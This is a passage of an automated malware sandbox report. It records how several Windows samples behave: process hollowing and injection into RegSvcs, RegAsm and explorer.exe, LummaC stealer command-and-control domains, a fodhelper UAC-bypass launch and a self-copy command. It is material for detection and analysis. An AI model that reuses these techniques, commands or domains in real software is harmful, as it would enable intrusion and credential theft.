Source: C086.exe.1.dr, Redist.cs	Reference to suspicious API methods: Marshal.WriteIntPtr(new IntPtr(intPtr.ToInt64() + num), GetProcAddress(moduleHandle, array5[i]))
Source: C086.exe.1.dr, Redist.cs	Reference to suspicious API methods: VirtualProtect(intPtr, 65536u, 64u, out var _)

Allocates memory in foreign processes

Source: C:\Users\user\AppData\Local\Temp\4854.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\88D9.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\928F.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write

Contains functionality to inject code into remote processes

Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe

Code function: 14_2_005C0110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess,

14_2_005C0110

Creates a thread in another existing process (thread injection)

Source: C:\Users\user\Desktop\uVQLD8YVk6.exe	Thread created: C:\Windows\explorer.exe EIP: 13A1970	Jump to behavior
Source: C:\Users\user\AppData\Roaming\srvwauv	Thread created: unknown EIP: 32C1970	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Thread created: unknown EIP: 9D01930

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Local\Temp\4854.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Memory written: C:\Users\user\AppData\Local\Temp\toolspub2.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\88D9.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\928F.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A

LummaC encrypted strings found

Source: 88D9.exe, 00000013.00000002.2101399070.0000000003ED5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: chincenterblandwka.pw
Source: 88D9.exe, 00000013.00000002.2101399070.0000000003ED5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: politefrightenpowoa.pw
Source: 88D9.exe, 00000013.00000002.2101399070.0000000003ED5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: opposesicknessopw.pw
Source: 928F.exe, 0000001C.00000002.2211012658.000000000361A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: cakecoldsplurgrewe.pw
Source: 928F.exe, 0000001C.00000002.2211012658.000000000361A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: reviveincapablewew.pw
Source: 928F.exe, 0000001C.00000002.2211012658.000000000361A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ratefacilityframw.fun
Source: 928F.exe, 0000001C.00000002.2211012658.000000000361A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: neighborhoodfeelsa.fun
Source: 928F.exe, 0000001C.00000002.2211012658.000000000361A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: dayfarrichjwclik.fun
Source: 928F.exe, 0000001C.00000002.2211012658.000000000361A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: soupinterestoe.fune
Source: 9E77.exe, 0000001E.00000003.2170961305.00000000025A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: soupinterestoe.fund

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\uVQLD8YVk6.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\Desktop\uVQLD8YVk6.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior
Source: C:\Users\user\AppData\Roaming\srvwauv	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\srvwauv	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read

Sample uses process hollowing technique

Source: C:\Users\user\AppData\Local\Temp\4854.exe	Section unmapped: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base address: 400000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4854.exe	Section unmapped: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base address: 400000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\928F.exe	Section unmapped: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base address: 400000

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\Temp\4854.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4854.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4854.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 42E000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4854.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 43A000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4854.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 9E8008	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\88D9.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\Users\user\AppData\Local\Temp\88D9.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
Source: C:\Users\user\AppData\Local\Temp\88D9.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 444000
Source: C:\Users\user\AppData\Local\Temp\88D9.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 448000
Source: C:\Users\user\AppData\Local\Temp\88D9.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 45A000
Source: C:\Users\user\AppData\Local\Temp\88D9.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: B7E008
Source: C:\Users\user\AppData\Local\Temp\928F.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000
Source: C:\Users\user\AppData\Local\Temp\928F.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000
Source: C:\Users\user\AppData\Local\Temp\928F.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 44E000
Source: C:\Users\user\AppData\Local\Temp\928F.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 452000
Source: C:\Users\user\AppData\Local\Temp\928F.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 469000
Source: C:\Users\user\AppData\Local\Temp\928F.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 7F1008

Source: C:\Users\user\AppData\Local\Temp\is-U9MHE.tmp\tuc4.tmp

Code function: 23_2_00477108 ShellExecuteEx,GetLastError,MsgWaitForMultipleObjects,GetExitCodeProcess,CloseHandle,

23_2_00477108

Source: C:\Users\user\AppData\Local\Temp\4854.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4854.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\780F.exe	Process created: C:\Users\user\AppData\Local\Temp\InstallSetup8.exe "C:\Users\user\AppData\Local\Temp\InstallSetup8.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\780F.exe	Process created: C:\Users\user\AppData\Local\Temp\toolspub2.exe "C:\Users\user\AppData\Local\Temp\toolspub2.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\780F.exe	Process created: C:\Users\user\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe "C:\Users\user\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\780F.exe	Process created: C:\Users\user\AppData\Local\Temp\tuc4.exe "C:\Users\user\AppData\Local\Temp\tuc4.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\780F.exe	Process created: C:\Users\user\AppData\Local\Temp\etopt.exe "C:\Users\user\AppData\Local\Temp\etopt.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Process created: C:\Users\user\AppData\Local\Temp\toolspub2.exe "C:\Users\user\AppData\Local\Temp\toolspub2.exe"
Source: C:\Users\user\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\Sysnative\cmd.exe /C fodhelper
Source: C:\Users\user\AppData\Local\Temp\88D9.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Source: C:\Users\user\AppData\Local\Temp\928F.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Source: C:\Users\user\AppData\Local\Temp\C086.exe	Process created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
Source: C:\Users\user\AppData\Local\Temp\CFAA.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 helpmsg 23
Source: C:\Users\user\AppData\Local\Temp\F38F.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c copy "C:\Users\user\AppData\Local\Temp\F38F.exe" "C:\ProgramData\xQfUeydaBrjuHptx.exe" && ping 1.1.1.1
Source: C:\Users\user\AppData\Local\Temp\F38F.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping 1.1.1.1
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown

Source: C:\Users\user\AppData\Local\Temp\is-U9MHE.tmp\tuc4.tmp

Code function: 23_2_0042DFC4 AllocateAndInitializeSid,GetVersion,GetModuleHandleA,GetProcAddress,CheckTokenMembership,GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,GetTokenInformation,EqualSid,CloseHandle,FreeSid,

23_2_0042DFC4

Source: BroomSetup.exe, 00000010.00000000.2059737099.0000000000401000.00000020.00000001.01000000.0000000E.sdmp	Binary or memory string: Shell_TrayWndSVW
Source: explorer.exe, 00000001.00000000.1665551079.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1666460047.0000000004CE0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1668045299.0000000009815000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000001.00000000.1665551079.00000000018A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000001.00000000.1665346300.0000000001240000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 1Progman$
Source: explorer.exe, 00000001.00000000.1665551079.00000000018A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 00000001.00000000.1665551079.00000000018A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: }Program Manager
Source: BroomSetup.exe, 00000010.00000000.2059737099.0000000000401000.00000020.00000001.01000000.0000000E.sdmp	Binary or memory string: Shell_TrayWndReBarWindow32MSTaskSwWClassToolbarWindow32SV

Source: C:\Users\user\AppData\Local\Temp\4854.exe

Code function: 4_2_6CE884B0 cpuid

4_2_6CE884B0

Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,__invoke_watson,___crtGetLocaleInfoW,	14_2_0040A95A
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,	14_2_00417103
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: EnumSystemLocalesA,	14_2_004171C6
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,	14_2_004171F0
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,	14_2_00415191
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: GetLocaleInfoA,	14_2_0041D19B
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,	14_2_00417257
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,	14_2_00414AF0
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itoa_s,	14_2_00417293
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,InterlockedDecrement,InterlockedDecrement,	14_2_004153E9
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: GetLocaleInfoW,	14_2_00413B87
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: _LocaleUpdate::_LocaleUpdate,GetLocaleInfoW,	14_2_00413BA0
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLastError,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,GetLocaleInfoA,	14_2_00413C0A
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: GetLocaleInfoA,	14_2_0041C4C7
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	14_2_00413D49
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: GetLocaleInfoA,GetLocaleInfoA,GetACP,	14_2_00416D0E
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,	14_2_00416E25
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,InterlockedDecrement,InterlockedDecrement,	14_2_004156AF
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: GetLocaleInfoA,_LcidFromHexString,_GetPrimaryLen,_strlen,	14_2_00416EBD
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,	14_2_00416F31
Source: C:\Users\user\AppData\Local\Temp\tuc4.exe	Code function: GetLocaleInfoA,	18_2_004051FC
Source: C:\Users\user\AppData\Local\Temp\tuc4.exe	Code function: GetLocaleInfoA,	18_2_00405248
Source: C:\Users\user\AppData\Local\Temp\is-U9MHE.tmp\tuc4.tmp	Code function: GetLocaleInfoA,	23_2_00408570
Source: C:\Users\user\AppData\Local\Temp\is-U9MHE.tmp\tuc4.tmp	Code function: GetLocaleInfoA,	23_2_004085BC

Source: C:\Users\user\AppData\Local\Temp\nsa984B.tmp.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\nsa984B.tmp.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Windows\System32\dialer.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0

Source: C:\Users\user\AppData\Local\Temp\F38F.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion DigitalProductId

Source: C:\Users\user\AppData\Local\Temp\4854.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\4854.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4854.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4854.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4854.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4854.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\780F.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\780F.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\88D9.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\88D9.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\etopt.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\928F.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\928F.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\928F.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\928F.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\928F.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\928F.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9E77.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9E77.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9E77.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9E77.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9E77.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9E77.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9E77.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9E77.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9E77.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9E77.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9E77.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9E77.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9E77.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9E77.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9E77.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9E77.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9E77.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9E77.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9E77.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9E77.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9E77.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9E77.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9E77.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9E77.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9E77.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9E77.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9E77.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9E77.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9E77.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9E77.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9E77.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9E77.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9E77.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9E77.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9E77.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9E77.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\nsa984B.tmp.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\nsa984B.tmp.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\ VolumeInformation
